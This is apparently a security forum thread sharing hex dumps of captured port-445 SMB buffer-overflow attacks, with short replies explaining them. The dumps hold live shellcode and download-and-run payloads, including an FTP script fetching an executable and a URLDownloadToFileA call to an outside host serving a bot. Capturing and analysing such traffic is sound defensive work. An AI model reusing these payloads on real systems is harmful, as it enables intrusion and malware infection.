1 recommendation |
More 445 sample attacksGiven the heighten state of internet alerts (ie Infocon is at Yellow and SecurityFocus is at ThreatCon2), I thought I capture some more 445 attacks and post them here.
First one of interest
68.144.76.36 : 4764 TCP Data In Length 1460 bytes MD5 = 95565AAE6215C7B937E714D3A6EEA318 ---- 13/08/2005 09:29:45.035 0 00 00 10 BF FF 53 4D 42 73 00 00 00 00 18 07 C8 .....SMBs....... 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 37 13 ..............7. 20 00 00 00 00 0C FF 00 00 00 04 11 0A 00 00 00 00 ................ 30 00 00 00 7E 10 00 00 00 00 D4 00 00 80 7E 10 60 ...~.........~.` 40 82 10 7A 06 06 2B 06 01 05 05 02 A0 82 10 6E 30 ..z..+........n0 50 82 10 6A A1 82 10 66 23 82 10 62 03 82 04 01 00 ..j...f#..b..... 60 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 70 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 80 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 100 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 110 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 120 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 140 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 160 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 170 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 180 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 190 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 200 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 210 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 220 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 230 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 240 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 250 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 260 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 270 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 280 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 290 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 300 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 310 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 320 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 330 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 340 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 350 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 360 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 370 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 380 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 390 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 400 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 410 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 420 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 430 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 440 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 450 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 460 03 00 23 82 0C 57 03 82 04 0A 00 90 42 90 42 90 ..#..W......B.B. 470 42 90 42 81 C4 54 F2 FF FF FC E8 46 00 00 00 8B B.B..T.....F.... 480 45 3C 8B 7C 05 78 01 EF 8B 4F 18 8B 5F 20 01 EB E i&echo us 530 65 72 20 31 20 31 20 3E 3E 20 69 20 26 65 63 68 er 1 1 >> i &ech 540 6F 20 67 65 74 20 65 72 61 73 65 6D 65 5F 31 35 o get eraseme_15 550 35 37 35 2E 65 78 65 20 3E 3E 20 69 20 26 65 63 575.exe >> i &ec 560 68 6F 20 71 75 69 74 20 3E 3E 20 69 20 26 66 74 ho quit >> i &ft 570 70 20 2D 6E 20 2D 73 3A 69 20 26 65 72 61 73 65 p -n -s:i &erase 580 6D 65 5F 31 35 35 37 35 2E 65 78 65 0D 0A 00 42 me_15575.exe...B 590 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 5A0 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 5B0 42 42 42 42 BBBB
Blake |
|
|
So what exactly would this try to do on a persons system?
I dont see anything that looks like a payload, not that I would know I guess LOL other than the erase me stuff at the end or is this a DOS type packet? |
|
1 edit |
to Link Logger
It is building a file that contains FTP commands to fetch a file called eraseme_15.exe. What that exe does I do not know. |
|
1 edit |
to Link Logger
I have a question for you Mr Link Logger, That is one huge packet log and i've never seen them that big on my system... Can I assume your running a "Full packet log" in your firewall program and thats why it's so big ? Just curious...
Just for infor: I use SPF v5.5.2710, running an older PC here and thats the one that only works for me currently... Previously when I had the full packing log running, I had problems with trojans, so I disabled mine (single pc, home ran, user acct mode, not Admin).....
Tks, Sherri |
|
jvmorrisI Am The Man Who Was Not There. MVM join:2001-04-03 Reston, VA |
Probably a capture that Blake made using PortPeeker. You can find it via the website at www.linklogger.com , if that's what it is. |
|
3 edits |
These are PortPeeker captures. Most attacks on 445 operate on the same principle, buffer over flow, execute some command to go and get the worm and then execute it. This one uses http to get the worm body. I'll capture some of the worm bodies and post them in the malware forum later. 68.144.201.207 : 3048 TCP Data In Length 1460 bytes MD5 = 7EEE0C2140504F9698AED1DB3281ECAE ---- 13/08/2005 09:42:15.664 0 00 00 10 BF FF 53 4D 42 73 00 00 00 00 18 07 C8 .....SMBs....... 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 37 13 ..............7. 20 00 00 00 00 0C FF 00 00 00 04 11 0A 00 00 00 00 ................ 30 00 00 00 7E 10 00 00 00 00 D4 00 00 80 7E 10 60 ...~.........~.` 40 82 10 7A 06 06 2B 06 01 05 05 02 A0 82 10 6E 30 ..z..+........n0 50 82 10 6A A1 82 10 66 23 82 10 62 03 82 04 01 00 ..j...f#..b..... 60 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 70 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 80 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 100 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 110 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 120 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 140 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 160 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 170 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 180 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 190 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 200 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 210 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 220 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 230 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 240 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 250 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 260 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 270 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 280 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 290 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 300 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 310 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 320 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 330 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 340 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 350 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 360 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 370 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 380 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 390 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 400 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 410 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 420 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 430 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 440 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 450 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 460 03 00 23 82 0C 57 03 82 04 0A 00 90 42 90 42 90 ..#..W......B.B. 470 42 90 42 E9 86 00 00 00 5B E8 8D 01 00 00 8D B3 B.B.....[....... 480 04 00 00 00 8D BB 0D 00 00 00 C7 83 A5 00 00 00 ................ 490 0F 00 00 00 E8 1D 01 00 00 89 83 3C 00 00 00 8D ...........<.... 4A0 BB 1C 00 00 00 C7 83 A5 00 00 00 0D 00 00 00 E8 ................ 4B0 02 01 00 00 89 83 38 00 00 00 8D BB 29 00 00 00 ......8.....)... 4C0 E8 E7 00 00 00 89 83 34 00 00 00 8D B3 40 00 00 .......4.....@.. 4D0 00 8D BB 47 00 00 00 E8 D0 00 00 00 89 83 5A 00 ...G..........Z. 4E0 00 00 8D B3 5E 00 00 00 8D BB 65 00 00 00 E8 B9 ....^.....e..... 4F0 00 00 00 89 83 6C 00 00 00 E8 78 01 00 00 E8 75 .....l....x....u 500 FF FF FF 00 00 00 00 6B 65 72 6E 65 6C 33 32 00 .......kernel32. 510 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 4C GetProcAddress.L 520 6F 61 64 4C 69 62 72 61 72 79 41 00 45 78 69 74 oadLibraryA.Exit 530 54 68 72 65 61 64 00 00 00 00 00 00 00 00 00 00 Thread.......... 540 00 00 00 75 72 6C 6D 6F 6E 00 55 52 4C 44 6F 77 ...urlmon.URLDow 550 6E 6C 6F 61 64 54 6F 46 69 6C 65 41 00 00 00 00 nloadToFileA.... 560 00 6D 73 76 63 72 74 00 73 79 73 74 65 6D 00 00 .msvcrt.system.. 570 00 00 00 62 6F 74 2E 65 78 65 00 55 55 55 55 55 ...bot.exe.UUUUU 580 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 UUUUUUUUUUUUUUUU 590 55 55 55 00 00 00 00 00 00 00 00 00 00 00 00 00 UUU............. 5A0 00 00 00 00 00 00 00 00 00 00 00 00 56 FF 53 38 ............V.S8 5B0 57 50 FF 53 WP.S
68.144.201.207 : 3048 TCP Data In Length 1460 bytes MD5 = F37F645FB811C34C79E2B4D44DCC6410 ---- 13/08/2005 09:42:15.774 0 3C C3 31 D2 89 D0 C1 E0 02 8B 8B 9D 00 00 00 01 <.1............. 10 C1 8B 01 03 83 91 00 00 00 57 56 89 FE 89 C7 42 .........WV....B 20 8B 8B A5 00 00 00 F3 A6 5E 5F 75 D8 4A 89 D0 D1 ........^_u.J... 30 E0 8B 8B A1 00 00 00 01 C1 31 C0 66 8B 01 C1 E0 .........1.f.... 40 02 8B 8B 99 00 00 00 01 C8 8B 08 03 8B 91 00 00 ................ 50 00 89 C8 C3 31 C0 C3 64 A1 30 00 00 00 3E 8B 40 ....1..d.0...>.@ 60 0C 3E 8B 70 1C AD 3E 8B 68 08 89 AB 91 00 00 00 .>.p..>.h....... 70 89 E8 05 3C 00 00 00 8B 08 03 8B 91 00 00 00 81 ...<............ 80 C1 78 00 00 00 8B 31 03 B3 91 00 00 00 81 C6 18 .x....1......... 90 00 00 00 AD 89 83 95 00 00 00 AD 03 83 91 00 00 ................ A0 00 89 83 99 00 00 00 AD 03 83 91 00 00 00 89 83 ................ B0 9D 00 00 00 AD 03 83 91 00 00 00 89 83 A1 00 00 ................ C0 00 C3 E9 21 00 00 00 59 31 C0 50 50 8D 53 70 52 ...!...Y1.PP.SpR D0 8D 91 04 00 00 00 52 50 FF 53 5A 8D 53 70 52 FF ......RP.SZ.SpR. E0 53 6C 31 C0 50 FF 53 34 E8 DA FF FF FF 00 00 00 Sl1.P.S4........ F0 00 68 74 74 70 3A 2F 2F 68 61 6E 64 79 64 6A 73 .http://handydjs 100 2E 63 6F 6D 2F 62 6F 74 2E 65 78 65 00 55 55 55 .com/bot.exe.UUU 110 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 UUUUUUUUUUUUUUUU 120 55 55 55 00 42 42 42 42 42 42 42 42 42 42 42 42 UUU.BBBBBBBBBBBB 130 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 140 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 150 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 160 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 170 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 180 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 190 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 1A0 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 1B0 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 1C0 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 1D0 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 1E0 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 1F0 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 200 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 210 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 220 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 230 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 240 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 250 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 260 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 270 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 280 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 290 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 2A0 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 2B0 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 2C0 23 0A 03 08 00 F8 0F 01 00 F8 0F 01 23 82 08 39 #...........#..9 2D0 03 82 04 11 00 43 43 43 43 20 F0 FD 7F 53 56 57 .....CCCC ..SVW 2E0 66 81 EC 80 00 89 E6 E8 ED 00 00 00 FF 36 68 09 f............6h. 2F0 12 D6 63 E8 F7 00 00 00 89 46 08 E8 A2 00 00 00 ..c......F...... 300 FF 76 04 68 6B D0 2B CA E8 E2 00 00 00 89 46 0C .v.hk.+.......F. 310 E8 3F 00 00 00 FF 76 04 68 FA 97 02 4C E8 CD 00 .?....v.h...L... 320 00 00 31 DB 68 10 04 00 00 53 FF D0 89 C3 56 8B ..1.h....S....V. 330 76 10 89 C7 B9 10 04 00 00 F3 A4 5E 31 C0 50 50 v..........^1.PP 340 50 53 50 50 FF 56 0C 8B 46 08 66 81 C4 80 00 5F PSPP.V..F.f...._ 350 5E 5B FF E0 60 E8 23 00 00 00 8B 44 24 0C 8D 58 ^[..`.#....D$..X 360 7C 83 43 3C 05 81 43 28 00 10 00 00 81 63 28 00 |.C<..C(.....c(. 370 F0 FF FF 8B 04 24 83 C4 14 50 31 C0 C3 31 D2 64 .....$...P1..1.d 380 FF 32 64 89 22 31 DB B8 90 42 90 42 31 C9 B1 02 .2d."1...B.B1... 390 89 DF F3 AF 74 03 43 EB F3 89 7E 10 64 8F 02 58 ....t.C...~.d..X 3A0 61 C3 60 BF 20 F0 FD 7F 8B 1F 8B 46 08 89 07 8B a.`. .....F.... 3B0 7F F8 81 C7 78 01 00 00 89 F9 39 19 74 04 8B 09 ...x.....9.t... 3C0 EB F8 89 FA 39 5A 04 74 05 8B 52 04 EB F6 89 11 ....9Z.t..R..... 3D0 89 4A 04 C6 43 FD 01 61 C3 A1 0C F0 FD 7F 8B 40 .J..C..a......@ 3E0 1C 8B 58 08 89 1E 8B 00 8B 40 08 89 46 04 C3 60 ..X......@..F..` 3F0 8B 6C 24 28 8B 45 3C 8B 54 05 78 01 EA 8B 4A 18 .l$(.E<.T.x...J. 400 8B 5A 20 01 EB E3 38 49 8B 34 8B 01 EE 31 FF 31 .Z ...8I.4...1.1 410 C0 FC AC 38 E0 74 07 C1 CF 0D 01 C7 EB F4 3B 7C ...8.t........;| 420 24 24 75 E1 8B 5A 24 01 EB 66 8B 0C 4B 8B 5A 1C $$u..Z$..f..K.Z. 430 01 EB 8B 04 8B 01 E8 89 44 24 1C 61 C2 08 00 EB ........D$.a.... 440 FE 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 .CCCCCCCCCCCCCCC 450 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 460 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 470 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 480 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 490 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 4A0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 4B0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 4C0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 4D0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 4E0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 4F0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 500 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 510 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 520 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 530 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 540 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 550 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 560 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 570 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 580 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 590 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 5A0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 5B0 43 43 43 43 CCCC
68.144.201.207 : 3048 TCP Data In Length 1371 bytes MD5 = 3C17DF7DE06FA0DB4A628D256B39A049 ---- 13/08/2005 09:42:15.824 0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 10 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 20 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 30 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 40 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 50 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 60 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 70 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 80 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 90 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC A0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC B0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC C0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC D0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC E0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC F0 43 43 43 43 43 43 